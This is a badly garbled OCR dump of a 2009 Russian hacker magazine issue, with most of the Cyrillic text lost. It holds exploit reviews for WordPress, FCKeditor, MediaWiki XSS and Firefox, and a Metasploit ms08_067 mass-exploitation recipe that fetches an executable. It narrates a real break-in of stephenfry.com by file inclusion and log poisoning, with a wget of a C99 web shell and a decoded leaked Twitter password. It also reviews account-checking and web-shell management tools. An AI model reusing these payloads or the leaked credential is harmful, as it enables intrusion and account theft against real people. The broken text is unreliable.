RainbowTableGenerate.exe md5 alpha 1 8 0 2400 40000000 xek 240
:
Md5 ;
alpha ;
1 8 ;
0 ;
2400 40000000 ;
xek ;
240 . GeForce
GTX 280. 240 .
. z
CUDA
>>
(ICQ 884888)
/ HTTP://WAP-CHAT.RU /
OBZOR KSPLOITOV
- .
, , .
, WordPress, MediaWiki, Mozilla Firefox, MS
Internet Explorer MS Office,
web cms, WYSIWYG- FCKeditor.
01
WORDPRESS
>> Brief
WordPress
, . Core Security Technologies (http://
www.coresecurity.com/corelabs) ,
( )
.
XSS- , .
./
wp-admin/options-general.php?page=[plugin_page],
.
./wp-admin/admin.php, . :
// ,
./wp-content/plugins
if (isset($_GET['page']))
{
$plugin_page = stripslashes($_GET['page']);
$plugin_page = plugin_basename($plugin_page);
}
...
// Handle plugin admin pages.
if (isset($plugin_page))
{
if ( validate_file($plugin_page) )
{
,
.
.
>> Targets
WordPress 2.8 .
WordPress MU 2.7.1 .
>> Exploit
:
1. Collapsing Archives:
http://[some_wordpress_blog]/wp-admin/admin.php?page=/
collapsing-archives/options.txt
2. - Akismet, :
http://[some_wordpress_blog]/wp-admin/admin.
php?page=akismet/readme.txt
http://[some_wordpress_blog]/wp-admin/admin.
php?page=related-ways-to-take-action/options.php
>>
advisory http://milw0rm.com/
exploits/9110.
>> SOLUTION
, wordpress.com (
2.8.1).
02
FCKEDITOR
>> Brief
FCKeditor, TinyMCE, WYSIWYG- WEB-x, Zope, PHPList, Falt4 CMS, RunCMS, Dokeos, Nuke ET.
,
, CurrentFolder (, www.securitylab.ru/vulnerability/382191.php www.securityfocus.
com/bid/31812). ,
HTML based
.
, (http://dfn.dl.sourceforge.net/
sourceforge/fckeditor/FCKeditor_2.6.4.zip) , upload ./
editor/filemanager/connectors/php/upload.php:
<?php
...
$sCurrentFolder = GetCurrentFolder() ;
GetCurrentFolder(), ./editor/
filemanager/connectors/php/io.php:
function GetCurrentFolder()
{
    if (!isset($_GET)) {
        global $_GET;
    }
    $sCurrentFolder = isset( $_GET['CurrentFolder'] ) ? $_GET['CurrentFolder'] : '/' ;
    // Check the current folder syntax (must begin and start with a slash).
    if ( !preg_match( '|/$|', $sCurrentFolder ) )
        $sCurrentFolder .= '/' ;
    if ( strpos( $sCurrentFolder, '/' ) !== 0 )
        $sCurrentFolder = '/' . $sCurrentFolder ;
    // Ensure the folder path has no double-slashes
    while ( strpos ($sCurrentFolder, '//') !== false )
    {
        $sCurrentFolder = str_replace ('//', '/', $sCurrentFolder) ;
    }
    // Check for invalid folder paths (..)
    if ( strpos( $sCurrentFolder, '..' ) || strpos( $sCurrentFolder, "\\" ))
        SendError( 102, '' ) ;
    return $sCurrentFolder ;
}
, , FileUpload()
./editor/filemanager/connectors/php/commands.php:
function FileUpload(
$resourceType, $currentFolder, $sCommand )
{
...
// Map the virtual path to the local server path.
$sServerDir = ServerMapFolder($resourceType,
$currentFolder, $sCommand ) ;
MEDIAWIKI
...
AKISMET/README.TXT WORDPRESS
FCKEDITOR
-, Amalthea 13
XSS-.
./includes/specials/SpecialBlockip.php site.com/index.php/Special:Block.
, :
CALC.EXE, FIREFOX
...
move_uploaded_file( $oFile['tmp_name'],
$sFilePath ) ;
...
}
<?php
...
class IPBlockForm
{
...
function IPBlockForm( $par )
{
global $wgRequest, $wgUser, $wgBlockAllowsUTEdit;
// wpBlockAddress $_REQUEST
$this->BlockAddress = $wgRequest->getVal(
'wpBlockAddress', $wgRequest->getVal( 'ip', $par ) );
$this->BlockAddress = strtr(
$this->BlockAddress, '_', '' );
...
}
...
>> Exploit
FCKeditor ./editor/filemanager/
connectors/uploadtest.html.
, Select the File Uploader to use PHP (,
), Upload a
new file , .txt , ,
Current Folder - my-evil-shell.php%00.
, ,
Uploaded File URL (
./userfiles/test.php).
, $sFilePath move_uploaded_file()
($sServerDir),
($sFileName) - -.
// html-
function showForm( $err )
{
...
$user = User::newFromName( $this->BlockAddress );
...
//
wpBlockAddress -
Xml::input( 'wpBlockAddress', 45,
$this->BlockAddress, array(
FCKEDITOR
>> Targets:
FCKeditor <=2.6.4, web cms,
WYSIWYG-.
>> Solution
, http://www.
fckeditor.net.
03
MEDIAWIKI
>> Brief
-! MediaWiki,
CALC.EXE, ACTIVEX IE
TUN KERNEL
wpBlockAddress ( $this->BlockAddress) ,
.
>> Exploit
.
- :
04
MOZILLA
FIREFOX
>> Brief:
,
. Firefox
3.5, SBerry aka Simon Berry-Byrne
, .
Just-in-Time (JIT,
JavaScript ): JavaScript
HTML (, font)
, escape().
, , Andrew Haynes
( Denial of Service)
Mozilla Firefox 3.5 Unicode Data Remote Stack Buffer
Overflow Vulnerability. unicode- write JS.
>> Targets
Firefox 3.5 , , .
http://site.com/index.php/Special:Block/?wpBlockAddre
ss="/><script>alert('Privet! Ya MegaXSS :)')</script><a
href="
>> Solution
security- mozilla.
com/firefox.
XSS , .
>> Exploit:
PoC (http://milw0rm.com/exploits/9137),
calc.exe,
html- javascript:
>> Targets
MediaWiki:
MediaWiki <= 1.14.0
MediaWiki <= 1.15.0
>> Solution
,
mediawiki.org/wiki/Download.
<html>
<head>
<script language="JavaScript" type=Text/Javascript">
var str = unescape("%u4141%u4141");
var str2 = unescape("%u0000%u0000");
write() , ,
unicode-.
Firefox - (
).
05
MICROSOFT OFFICE WEB
COMPONENTS SPREADSHEET ACTIVEX
>> Brief:
.
IE,
Microsoft Office Web Components Spreadsheet ActiveX. ActiveX
Internet Explorer
Excel. , ,
msDataSourceObject()
(OWC 10 OWC11). (,
iframe)
. , IE,
MS Office,
.
>> Exploits
http://www.securitylab.ru/vulnerability/382430.php.
ActiveX, , OWC10.Spreadsheet
OWC11.Spreadsheet.
>> Targets:
Microsoft Office XP Service Pack 3;
Microsoft Office 2003 Service Pack 3;
Microsoft Office XP Web Components Service Pack 3;
Microsoft Office Web Components 2003 Service Pack 3;
Microsoft Office 2003 Web Components for the 2007 Microsoft Office system
Service Pack 1;
Microsoft Internet Security and Acceleration Server 2004 Standard Edition
Service Pack 3;
Microsoft Internet Security and Acceleration Server 2004 Enterprise Edition
Service Pack 3;
Microsoft Internet Security and Acceleration Server 2006;
Internet Security and Acceleration Server 2006 Supportability Update;
Microsoft Internet Security and Acceleration Server 2006 Service Pack 1;
Microsoft Office Small Business Accounting 2006.
>> Solution:
, Microsoft .
CLSID:
{0002E541-0000-0000-C000-000000000046}
{0002E559-0000-0000-C000-000000000046}
06
LINUX
>> Brief:
17 *Nix-,
grsecurity Brad Spengler PoC
Linux.
, Linux
.
, net/tun - tun_chr_poll() drivers/net/tun.c:
XSS MEDIAWIKI
, :
sk ,
. ,
, , .
,
,
if(!tun).
, ,
0x00000000,
.
>> Exploits
,
http://milw0rm.com/exploits/9191.
>> Targets:
Linux kernel <= 2.6.30 ( GCC
-fdelete-null-pointer-checks).
>> Solution:
GIT- : http://git.kernel.org.
START
M0R0 / M0R0@INBOX.RU /
>>
, ,
? , , .
,
. , Metasploit,
.
-
. ?
, , -
.
x-tool'z,
, ..
.
, ,
.
,
. ,
,
.
XP
MS08_067 DB_AUTOPWN
,
,
, . , 0-day,
. -,
nmap , ,
winpcap, .
EasyHack SKVOZ (z 2009)
. ,
.
,
. ,
, user guide. . ,
,
conficker
. , SKVOZ nmap
MS08_067.
-
.
.
,
.
2009 Microsoft
20 .
ms09-001 SMB.
, , ,
.
. , .
, .
( ,
).
(
WinXP) , ,
,
C MS08_067
.
. -,
.
cp866, Windows cp1251,
Koi8-r Unicod.
, meterpreter,
.
.
.
(trac.metasploit.com/ticket/253).
, , . , , ,
.
,
,
. : ,
, -
.
AutoIT, SciTe
AutoIT .
, ,
.
,
SID, ,
SID S-1-5-32-544. SID API-
LookupAccountName, AdvAPI32.dll. Security.
au3 - _Security__LookupAccountName.
(
user.au3 DVD).
TraySetState 2
AutoIT . , .
,
XP.
exe- .
, .
SMB. ,
,
user.
exe? , .
,
. , ftp.
ftp- ( FileZilla), ,
%temp%
ftp-
.
ftp.exe -s, user.exe .
.
,
. , ,
.
FTP ,
. ,
,
. ,
. , , .
( Radmin, VNC
..) .
, . RDP XP
:
.
, .
Redmond', ,
.
RDP, .
XP ,
( Home Edition, ,
).
,
- -
, , .
- XP ,
termsrv.dll
. ,
. , ,
, , ,
-
XP
HTTP://WWW
links
:
metasploit.org.
DVD
dvd
:
final.au3.
termsrv.dll.
.
,
.
.
, dll Windows File
Protection. ( CD
), . ,
. ,
, , ,
, .
, , , .
, , , - . , .
. , , ,
metasploit, ,
, , , , , .
, , ,
.
, .
. DVD
final.au3, , .
,
, .
fsp, ,
.
Au3Info
AutoIT. ,
2 .
fsp , .
.
,
RDP. ,
XP, .
XP, sc
, ,
fsp. ,
, .
dll (
TermService, ,
), dll %systemroot%\
system32\DLLCache ( ), , ,
%systemroot%\system32.
.
%temp%,
(, ),
%temp%\final.exe . ? psexec
. RDP.
, .
SMB
SMB
. , , Microsoft, , (
). 14
smb; . ms08_067, , ,
. netapi32.dll,
, wcscat ( , conficker).
RPC- UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188,
srvsvc.
,
. VmWare
, 2008 (
),
. , ,
.
,
ms08_067
!
, Make
SMB Connection error:53 (network path was not found).
, ,
. ,
.
DB_AUTOPWN
.
,
SFX
windows/upexec/
bind_tcp.
.
, ,
, .
,
,
, ,
. windows/download_exec.
Web-,
.
,
, XAMPP. .
URL
.
Exploit failed:
No encoders encoded the buffer successfully.
: download_exec
,
,
stager, , download_exec/bind_tcp.
.
RDP ,
.
,
, .
,
. -,
db_autopwn
,
5. , 5
.
-, db_autopwn
,
sessions l. ,
,
,
download_exec ,
- .
WEB- FTP-
XAMPP
INFO
info
Web-
FTP-
,
!
z. XAMPP
(apachefriends.org/
en/xampp.html).
,
PoC.
, ,
,
termsrv.dll ,
, ,
support_388945a0,
.
,
,
.
AUTOIT
%appdata%\msf32\
modules\payloads\singles\windows\download_exec.
rb . , , . !
session
Msf::Sessions::CommandShell.
.
, db_autopwn download_exec.
, SKVOZ
-b, ,
bind-.
, .
. ,
,
, . db_autopwn -.
db ( %appdata%\
msf32\lib\msf\ui\console\command_dispatcher\db.rb)
, meterpreter,
generic .
,
.
download_exec,
db.rb;
DVD .
- , -
, , -P.
:
-P,
; , .
.
,
.
%appdata%\.msf3\config
.
,
ms08_067
:
- TARGET=0 ( );
- PAYLOAD=windows/download_exec/
bind_tcp;
- URL=http://172.16.1.10/st.exe.
, ,
.
,
RDP. .
metasploit
:
load db_sqlite3
db_create
db_nmap -sT -PN -PS445 -p445
172.16.1.0/24
setg URL http://172.16.1.10/st.exe
db_autopwn -e -p -P windows/
download_exec/bind_tcp -m ms08_067
<ENTER> .
.
sessions l,
30 ,
. , mstsc . ! 30- ,
5 .
, ESET NOD32 4, Dr.Web
. ,
Outpost Kaspersky Anti-Hacker.
. NMAP 116
445,
30.
, ,
! , ?
,
SRVSVC.
, !
,
(forum.antichat.ru/thread99665.html),
, .
, ,
. :
- , ,
!. , :).
,
.
,
! , ,
!
! z
Payment Card Industry Data Security Standard (PCI DSS)
S4AVRD0W / S4AVRD0W@P0C.RU /
PCI DSS
>>
.
, .
, .
.
OSSTMM
OWASP.
-
, , Cobit, ISO/IEC
2700x, CIS/SANS/NIST/etc
PCI DSS.
, ,
,
. ,
. ,
.
,
, / .
,
,
OSSTMM
OWASP. , PCI DSS OWASP
(AsV), (QSA).
PCI DSS
:
1. (
)
.
2. -
(DoS). ,
.
3.
(PAN, Cardholder Name
..). (gray box)
.
,
24/7.
PCI :
DTP-
.11.1(b)
.11.2
(AsV)
.11.3.1
(Network-layer
penetration tests)
.11.3.2
(Applicationlayer penetration tests)
,
.
,
. ,
,
.
,
,
( , . Forb) . ,
PCI DSS, ,
:
(, , , ..)
(ACL/)
Web-
( , )
-
,
(,
N ),
, ,
.
NETWORK-LAYER
PENETRATION TESTS
(promiscuous
mode).
Wireshark CommView.
, 1-2 .
.
:
(STP, DTP
..)
(RIP,
EIGRP ..)
(DHCP, BOOTP)
(telnet, rlogin
..)
,
, ,
. ,
,
.
:
Yersinia.
,
DTP-
( ). DTP
ACCESS/DESIRABLE
. .
OSI.
ARPpoisoning. . ,
, Cain&Abel Ettercap
( ,
, SSL). ,
ARP-poisoning
,
,
, .
,
, /
, -
( , ,
, etc).
ARP-poisoning
,
(
WEB-BASED
SAINTEXPLOIT
INFO
info
:).
CORE IMPACT
APPLICATION-LAYER
PENETRATION TESTS
HTTP://WWW
links
pcisecuritystandards.
org PCI Security
Standards Council.
pcisecurity.ru ,
PCI DSS .
pcidss.ru ,
PCI DSS Digital
Security.
isecom.org/osstmm
Open Source
Security Testing
Methodology Manual.
owasp.org Open
Web Application
Security Project.
OSI. , ,
. ? .
Nmap Fast scan ( -F -T Aggressive|Insane),
( -p), ,
,
.
Nessus
XSpider ( ) .
(, Windows
NT 4.0), PCI .
,
- , .
PCI , -,
(
), -,
.
. . :).
.
,
. , -
. , .
,
.
1.
,
,
( !) -.
,
, . ,
. Core
Impact,
GUI-.
,
.
, , Core Impact, ,
, , ,
. Core Impact
.
: Core Impact, CANVAS, SAINTexploit
Metasploit Framework. , . ,
.
(,
).
Metasploit Framework. ,
zero-day , .
, ,
.
:).
, ,
.
. ,
, SAM (fgdump)
, LSA
(Cain&Abel),
. ,
PCI DSS (. 2.1, .2.1.1, .6.3.5, .6.3.6, .8.4,
.8.5.x).
2.
,
.
Windows (SMB),
.
,
, , ,
. PCI, ,
.
,
,
.
3.
, ,
-.
, , ( ,
SNMP) . AsV-
PCI DSS
,
DoS.
PCI,
(, WEB, ..).
Web. PCI Web . QSA-.
blackbox- server/client-side .
,
Web. HP WebInspect
Acunetix Web Vulnerability Scanner (,
, AJAX).
,
, w3af,
Web-.
Web! , ,
, -,
, SQL,
- . client-side , ,
, .
server-side ,
- , PCI DSS.
, PAN, Cardholder Name CVC2/
CVV2 . ,
,
SQL-
, ;
,
. Blind
SQL-, Web-
sqlmap ( --dump-all),
MySQL, Oracle, PostgreSQL
Microsoft SQL Server.
.
. ,
AppDetective Application Security Inc.,
. ,
,
,
AppDetective,
, .
, ,
. ,
:
Oracle Database Client
Toad for Oracle
PL/SQL
Oracle Assessment Kit SID
PL/SQL
(,
)
PCI
, , ,
,
, Open AP, WEP WPA/
PSK. , PCI
,
.
. , , aircrack-ng.
, ,
Caffe Latte,
.
Wirelessdefence.org.
PCI DSS. , ,
,
.
PCI,
MasterCard AsV-.
,
PCI DSS,
,
,
,
MasterCard.
! z
IN RESPONSE TO THE COMMANDS FROM
A MALICIOUS USER, CONCURRENT ATTACKS
TO TARGETING SITE BEGIN
Controlling
Server
Bot Infection
NUMBER OF COMMANDS
Concurrent
Attacks
- Infection Activities
- DoS Attacks
- Spam Mails
- Spyware
- Upgrades its
functionalities, etc
Malicious
User
Internet
User
Targeting Site
for Attacks
>>
,
, --
.
- ( !). ,
, .
.
. , ,
:).
, 2
. ,
, , , .
,
...
1000 10.000 ,
, , .
,
100.000.
,
,
.
P2P
:)
, . , ,
, ,
,
.
, , .
, ,
, , . ,
.
,
: ,
, .
.
, ,
.
, (
!
,
.
:
, :).
:
. .
:
?
? :).
, , .) . :
.
, .
.
IRC,
,
- . ,
,
.
p2p web.
p2p ,
.
,
.
:
...
web'
. , Zeus.
,
(
).
, ,
,
,
,
.
.
,
. ,
.
, (). ,
.
:
1234, : 6452, 12, 761 ..
, .
, ,
, -
,
.
.
:
, -
,
,
, ,
,
. . :
.com
.org
.ho.ua
Controlling
Server
HTTP://WWW
links
RSA-:
ru.wikipedia.org/wiki/
RSA.
Malicious
: ru.wikipedia.
User
org/wiki/__.
:
ru.wikipedia.org/wiki/
.
IRC-
INFO
info
RSA (
Rivest, Shamir
Adleman)
.
RSA ,
,
.
,
.ho.ua .
,
, .
. , , , , temp123.
txt, .
, , ,
.
( , ).
; , temp123.
txt . -
( , ..), . ,
.
,
, .
(, .
Pseudorandom number generator, PRNG) ,
,
( ).
-
.
.
. ORNL (.):
,
.
. ,
. :
,
, .
.
. .
:
,
,
, . .
:
WARNING
warning
.
: 3001-3004
:
3001 3004 . 4 ,
.
,
. 4 ( )
RSA-
, ,
RSA-
, ,
).
, , :
___: " "
RSA
: 3001
,
,
,
.
,
-
- .
.
, ,
, , , , , . ,
AES-,
BASE64. , ,
, .
, .
,
Perl', , ,
.
RSA. RSA
, ,
, .
. :
, . - .
:
1. _
2. tutamc.com
3. 00:01 08.07.2009
4. 23:59 09.07.2009
5. 1
6. ...
7. ___
, .
,
( ).
(, ) ,
, . ,
, ,
,
. ,
, ,
.
.
RSA 2048 .
. ,
,
- , AES.
.
, , .
(
,
. .
, ,
, ,
, .
RSA.
.
, .
POST-.
,
( , tttt123.php).
, ( tttt123.php
). ,
, , .
, . ,
. ,
.
Python'e,
. ,
,
.
FROM MY
, ( )
, , (
) , . ,
. z
TWITTER-
,
- , . ,
( ).
. ,
V ,
.
,
http://www.
stephenfry.com ,
-, .
stephenfry.com/clubfry/twitter.
API , ,
-
:). ,
twitter (twitter.com/stephenfry),
644,489(!) .
.
WordPress
phpBB.
(stephenfry.
com/blog), :
<meta name="generator" content="WordPress 2.5.1" />
, 2.5.1
,
.
phpBB. ,
stephenfry.
com/forum/docs/CHANGELOG.html.
change Changes since 2.0.20,
,
- (, ,
XSS CSRF ).
XSS phpBB,
:
site:stephenfry.com filetype:php
PHP-, . stephenfry.com/section.php?
section=clubfry&subsection=twitter.
:
, .
,
:
stephenfry.com/section.php?section
=clubfry&subsection=/../../../../.
./../../../../../../../../../../..
/etc/passwd%00
/etc/passwd :).
-
! ,
.
z,
STEPHENFRY.COM
, /proc/self/*.
/proc/self/environ:
stephenfry.com/section.php?section
=clubfry&subsection=/../../../../.
./../../../../../../../../../../..
/proc/self/environ%00
, /proc/self/environ
:(.
.
, error_log /proc/self/fd/2 ( , access_log
-
, LFI).
error_log
referer,
PHP-. , .
:
[Sat Jul 11 23:39:21 2009] [error]
[client x.x.x.x] client sent
HTTP/1.1 request without hostname
(see RFC2616 section 14.23): /
evil-,
Host. , , :
STEPHENFRY.COM
z:/usr/local/bin/curl.exe "http://
www.stephenfry.com/" -H "Host:"
--referer "<?php eval($_GET[cmd]);
?>"
,
error_log:
[Sat Jul 11 23:39:21 2009] [error]
[client x.x.x.x] client sent
HTTP/1.1 request without hostname
(see RFC2616 section 14.23): /,
referer: <?php eval($_GET[cmd]); ?>
HOST
HTTP://WWW
links
www.stephenfry.
com
.
ru.wikipedia.org/
wiki/_
.
twitter.com/
stephenfry
.
INFO
info
(Stephen John
Fry)
,
,
(
,
).
(1997).
, , ,
.
:
http://www.stephenfry.com/section.php?sec
tion=clubfry&subsection=/../../../../../..
/../../../../../../../../../../proc/self/
fd/2%00&cmd=phpinfo();
find
./ -type d -perm 0777 -ls , , .
/home/fry/public_html/img/blog_thumbs/
C99madShell blog.php wget:
http://www.stephenfry.com/section.php?sec
tion=clubfry&subsection=/../../../../../..
/../../../../../../../../../../proc/self/
fd/2%00&cmd=system('wget -O /home/fry/public_
html/img/blog_thumbs/blog.php http://madnet.
name/files/download/9_c99madshell.php');
. /home/fry/public_html/index.php:
<?php
include_once("lib/sf_main.php");
$aryBlogEntry = fnGetHomepageBlogArray();
$aryBlogStats = fnGetBlogStatsArray();
$aryForumStats = fnGetForumStatsArray();
$strSection = "";
$strSubSection = "";
include(SF_BASE_DIR."/templates/navigation/header.php");
...
?>
lib/sf_main.php:
<?php
include_once "sf_constants.php";
include_once "sf_db_class.php";
include_once "sf_template.php";
include_once "sf_cache_functions.php";
...
?>
, , lib/sf_constants.php:
<?php
...
// Twitter
define('SF_TWITTER_USER','stephenfry');
define('SF_TWITTER_PASSWORD','dzQxbGE4eW9uMz
d3bzQ=');
...
?>
, SF_TWITTER_PASSWORD
base64,
base64_decode w41la8yon37wo4.
! (
).
twitter.com
.
-, twitter.com,
stephenfry w41la8yon37wo4 :).
What are you doing?, Ill
be watching you! From Russia with love :) (
).
:
RegNomSongs by The Police and Matt Monroe. This is a
quiz, right? RT @stephenfry: Ill be watching you! From
Russia with love :)
---
, , ,
From Russia with love ,
.
-
, ,
// . , ,
:).
P.S. ,
. z
/ETC/PASSWD
WARNING
warning
.
.
,
,
.
R0ID
/ R0ID@BK.RU /
>>
:MAIL.RU HISTORY READER
: WINDOWS 2000/XP
:GAR|K
-
IM-
.
.
mail- Mail.ru,
.
, -
. ,
, :). , Mail.ru
History Reader. mail-
.
:
1. , : blabla@
mail.ruhistory.txt
2. DVD
3. history-
:
C:\conv.exe blabla@mail.ruhistory.
txt blabla@mail.ru.txt
4. blabla@mail.ru.txt,
:)
: ODNOKLASSNIKI.RU
PASSWORD CHANGER & ACCOUNT
CHECKER
: WINDOWS 2000/XP
: ZDEZ BIL YA
-
,
.
,
odnoklassniki.ru
: Odnoklassniki.ru Password Changer
Odnoklassniki.ru Account Checker.
,
.
aka .
:
accounts.txt, : ;.
:
good_acc.txt ,
;_
bad_acc.txt ,
;_
error_acc.txt ,
,
,
bad_acc.txt, :
( )
,
.
:
accounts.txt, :
;.
:
good_acc.txt ,
block_acc.txt , ,
-
bad_acc.txt , -
error_acc.txt , ,
,
. ,
win32-,
PHP/-, . Zdez Bil Ya
:).
: SHELL MANAGER
: *NIX/WIN
: KRIST_ALL
, , web-. ,
,
,
:). :
? Krist_ALL'
Shell manager, . -,
, :
-
-
-
- PR//Alexa_Rank
-
( -,
-)
-
:
1. ,
( : password)
2.
3. ,
$install 1
:
//---- ---------------
$db_host = ''; //
$db_login = ''; //
$db_password = ''; //
$db_name = ''; //
//---- Shell Mananger---
$use_auth = 1; // 1 , 0
$install = 1; // 1,
$password = 'password'; //
.
4. - :
if(isset($_GET['m'])) {echo 1; exit;}
elseif(isset($_GET['ev'])) { $sss
=base64_decode($_GET['ev']);
eval($sss); exit; }
5. , -.
: FTP PARSER
:*NIX/WIN
: [QWYZ]
-
: ? ,
,
. ,
FTP Parser,
-
. PHP-
3 :
- (, blabla.com)
, , :
$z = (, &z=com),
, * (,
&z=*)
$m = (, &m=14), ,
* (, &m=*)
$base = -,
./bases (, &base=file.txt)
$all = (, &all=1,&all=0)
$save = ( ./querie), ,
&save=yes,&save=no
$word =
(,
&word=blabla)
, , ,
./bases ( ) ./queries,
:
http://_/parser.
php?z=com&m=14&base=ftps.txt&all=0&s
ave=yes&word=freehostia.com
, .
: SYMVPN
:SYMBIAN
: TELEXY.COM
-
, - .
SymVPN
, VPN.
Symbian OS 3rd, ,
.
VPN-
SymVPN, PPTP
128- MPPE.
www.telexy.com, Symbian OS.
SymRDP (Symbian Remote Desktop Connection
Client), SymNC (Network Commander)
. , , x-USSR 40% (telexy.com/
Support/Publications.aspx?codeid=WGSBI6X6KV),
.
14 .
, ,
- 820 :).
(email, imei ). ,
IMEI- . ,
, :
1.
2.
3. , ,
(GPRS/Wi-Fi), IP-,
,
VPN-
4. .
,
VPN (IP///
DNS)
5.
( SymVPN)
.
, , VPN-
Symbian- VPN.
,
.z
1) Canon Cat
2) (70- )
3)
4)
MIFRILL
/ MIFRILL@REAL.XAKEP.RU /
IT .
, , ,
, .
, , .
Apple Macintosh, ,
, Apple .
,
,
,
, ,
.
, (Jef)
,
,
.
-, , ,
, .
26- 2005, 61
.
,
.
, -
,
:
. , ,
,
.
, ,
(, ,
,
?).
,
.
, , ,
.
.
,
,
Apple
,
,
.
Apple
1978 ,
31- . ,
23 1943,
,
,
.
,
, ,
,
.
Apple
. , , ,
,
,
.
3
,
-,
.
, , , IT
.
.
,
:
, .
, , . 70-
Western Wind ( ),
.
, ,
,
-
. Western Wind
(
, 70-)
,
.
, .
4
,
? , ,
,
.
, Apple
(
),
!
, ,
, ,
,
( Apple II).
,
,
-
. , ,
(
, ).
.
,
, ,
.
.
, ,
, . 1964-1965
,
,
.
(1967)
,
. , 70-
,
,
.
, ,
Apple
,
, ,
.
APPLE,
,
, .
.
Apple,
Annie,
.
,
.
,
, ,
. ,
,
,
.
, ,
- ,
. , , ,
. ,
(Macintosh)
,
McIntosh, .
,
,
.
-
,
, Apple
.
,
Apple Lisa,
,
.
, -
1) Canon
2) Apple Macintosh
( , , ).
, . Apple
, .
1
- , , .
, , [
] , ,
. ,
, ,
GUI
( ),
. ,
,
Lisa.
Apple III, .
( , Apple III $5000-8000), !
Apple III
, ,
. Apple Lisa, ,
Apple III, .
, ,
.
, , .
,
,
. , ,
Lisa , .
, ,
, , , . ,
apple- . ,
. ,
, , Xerox
.
, , .
,
,
, .
,
. ,
,
Macintosh Bicycle, . ,
, ,
,
, . ,
, -
.
1982 , ,
, ,
. ,
,
,
Apple.
. ,
Apple,
. Information Appliance, , .
Information Appliance
Apple II SwyftCard, SwyftWare.
-
, .
, .
, . ,
, ,
, ,
, .
, .
(, ),
, . , ,
, , , .
.
. ?
.
( GUI ),
,
, ,
.
.
SWYFT.
GUI SWYFT , , ,
-. , .
, SWYFT
, ,
. ,
,
, ,
. - , SWYFT
, , ,
.
LEAP (), ,
, Firefox, <Ctrl+F>.
, ,
LEAP-,
. , ,
LEAP
, , .. ,
, .
. , ,
, - , , QWERTY,
, .
SWYFT ,
.
(,
), ,
.
SWYFT
Apple II,
.
Information Appliance
,
-
Canon. , Canon
Motorola 68000 (
),
Canon Cat.
, ,
. 1987 ,
,
. .
,
(
20.000 ), ,
Canon
. ,
.
, Canon
, -
,
. , , ,
,
Apple NeXT Computers.
, ,
Canon
( ),
. , ,
.
, ,
.
, , ,
,
Canon,
,
2000- !
THE, ARCHI
1989
Information Appliance,
- .
90-,
,
,
. ,
BAYCHI (Bay-Area Computer-Human
Interface) ,
-,
,
IT (,
BMW). , ,
,
,
.
The Humane Interface, 2000 .
: .
-, ,
, ,
:).
SWYFT The Humane Environment (
THE),
The Humane Interface. ,
,
30 ,
( ,
-, ).
, IT- .
THE ,
Canon Cat. GUI,
, LEAP- ,
-, ..
- ,
, GUI ,
- ,
, .
, , ,
.
, ,
, THE - , ZUI Zooming
User Interface.
, ,
,
,
, 100%.
,
- .
, ,
.
,
1- 2005 ,
THE Archy. Archy
RCHI,
( )
(Raskin Center for Humane Interfaces).
,
.
, ,
26- 2005 .
,
,
.
Humanized Inc., Mozilla,
. , ,
?
,
. ,
GUI,
,
,
,
.
, ,
, ,
. z
069
>> unixoid
MOBLIN V2
UX (USER
EXPERIENCE)
BETA
LINUX MINT 7
GLORIA
FEDORA 11
LEONIDAS
CALCULATE
LINUX
DESKTOP 9.6
XFCE
BOBER
/ ZLOY.BOBR@GMAIL.COM /
Linux- - 2009
>> unixoid
GNU/Linux- , , - . , , z
.
FEDORA 11 LEONIDAS
: Fedora 11
: fedoraproject.org
: 9 2009
: GPL
: i586, x86_64, PPC,
PPC64, s390, s390x
, 9 18:00
FTP-
, ,
.
. : Desktop
Edition, LiveCD- GNOME KDE
( i686 x64 )
. 1
DVD 6 CD ( cd1). ,
. Desktop Edition
,
;
.
.
, 2008
Wikipedia
RHEL/Fedora Ubuntu, ,
: -
2 + 1
. , Fedora
6-8 ,
. LTS-, Ubuntu,
. . ,
Fedora,
DVD- (
docs.fedoraproject.org
ch-upgrade-x86.
html). ,
(
), Fedora 9
10, 11.
.
Fedora .
gcc 4.4, .
MinGW
Windows (
mingw32-*).
ext4.
ext4
Fedora 9, , ,
.
ext2/3. 48- ,
,
,
. , ext4
,
.
, ext4 . (Delayed
allocation), - 60
MINTINSTALL
, , .
.
2.6.30 ,
. /
boot ext2/3; ext4
.
.
, ,
(, ).
, .
Presto. diff-,
.
60-80% . ,
yum install
yum-presto. , RPM
4.7.
, .
PackageKit , ,
.
, .
, , MIME. , GNOME.
KDE mp3-
, (JuK),
.
:
# rpm -Uhv http://download1.rpmfusion.org/free/fedora/rpmfusion-free-release-rawhide.noarch.rpm http://download1.rpmfusion.org/nonfree/fedora/rpmfusion-nonfree-release-rawhide.noarch.rpm
# yum install gstreamer-plugins-bad gstreamer-plugins-ugly
,
20 .
, Bluetooth.
,
.
, ,
. , ,
:
# yum grouplist //
Calculate Linux Desktop 9.7 KDE.
: Kernel 2.6.28.10, KDE 4.2.4, X.Org 7.4, OpenOffice 3.0.1.
:
;
;
2.5 KDE;
USB Flash DVD HDD.
2 Flash;
LiveDVD .
2 .
calculate --update :
# layman -S && emerge calculate
INFO
info
Intel
Moblin Linux
Foundation.
Moblin :
Acer, HP, ASUS, MSI
.
Anaconda . , ,
. ,
Setup Agent.
LiveUSB Creator, .
, , KPackageKit
. yum update
61 .
,
KDE .
GNOME .
CALCULATE
CALCULATE
FEDORA LINUX
HTTP://WWW
links
DistroWatch
(distrowatch.com)
,
,
Linux,
/
OpenSolaris
xBSD.
MOBLIN
Linux Mint. , ,
Ubuntu +
( ) , 3- distrowatch.
com, openSUSE.
Mint 2006 ;
Clement Lefebvre.
Linux,
. Mint : , ,
,
. ,
- ,
.
APT- . ( , 1 ) .mint-,
, .
Software Portal . , Ubuntu.
5,
. Mint , Mint 1 Ada.
Linux Mint 7 Ubuntu 9.04 Jaunty Jackalope
LiveCD/DVD ,
. x86- (
64- ,
). GNOME.
Mint , ,
7 .
:
Main Edition LiveCD-, , ;
Universal Edition LiveDVD (1,3 ), X 08 /128/ 09
, .
, Main,
, .
. , Main
Edition, .
Live-
. . ,
.
Windows, . Computer.
mintDesktop, Compiz.
mintMenu KDE4.
; ,
Fedora 11 Spins
(fedoraproject.org/wiki/Releases/11/Spins),
: XFce ( ), Games,
Fedora Electronic Lab, Educations (
, ) AOS
(Appliance Operating System),
. OEM- . , .
Russian Fedora Remix 11 (www.
russianfedora.ru) Fedora . ;
, .
Filter. , .
, . ,
. ,
Gnome Do.
,
: , , , ,
, , .
/etc/apt/sources.list ,
Medibuntu.
Synaptic mintInstall, , .
.
. More Info
FEDORA
. Visit, .
Featured applications , .
